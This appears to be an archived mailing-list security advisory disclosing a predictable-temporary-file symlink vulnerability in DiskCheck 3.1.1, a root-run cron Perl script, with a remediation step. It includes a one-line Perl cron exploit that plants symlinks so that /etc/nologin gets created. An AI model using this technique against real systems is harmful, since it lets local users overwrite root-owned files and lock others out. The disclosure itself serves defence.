jhyouCHONNAM.CHONNAM.AC.KR

• Next message: Przemyslaw Frasunek: "HPUX FTPd vulnerability"
• Previous message: chrisRITC.CO.UK: "Netscape's Java Security Hole"
• Next in thread: Stan Bubrouski: "Re: Diskcheck 3.1.1 Symlink Vulnerability"
• Reply: Stan Bubrouski: "Re: Diskcheck 3.1.1 Symlink Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Diskcheck 3.1.1 Symlink Vulnerability

1 Introduction

DiskCheck is a Perl script that monitors how much space is available
on your hard drive. Basically, it checks your drive space every
hour and takes action based on the specifications in the config file
/etc/diskcheck.conf.

DiskCheck 3.1.1 is available from
http://www.kaybee.org/~kirk/html/linux.html and
RedHat Powertools 6.x.

2 Vulnerability

The command, /etc/cron.hourly/diskcheck.pl is executed with root
privilege
every hour. It creates a temporary file, whose default name is
/tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf,
is predictable and is willing to follow symbolic links. This may allow
malicious local users to create or overwrite arbitrarily named files.
3 Exploit

The following cron job creates the file, /etc/nologin.

0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
   symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'

4 Solution

Relocate the temporary file into the directory where root only can
create
a file.

Example)

Edit /etc/diskcheck.conf

 $tempfile = '/var/local/diskusagealert.txt'

# ls -ld /var/local
drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/

You, Jin-Ho, jhyouchonnam.ac.kr

• Next message: Przemyslaw Frasunek: "HPUX FTPd vulnerability"
• Previous message: chrisRITC.CO.UK: "Netscape's Java Security Hole"
• Next in thread: Stan Bubrouski: "Re: Diskcheck 3.1.1 Symlink Vulnerability"
• Reply: Stan Bubrouski: "Re: Diskcheck 3.1.1 Symlink Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]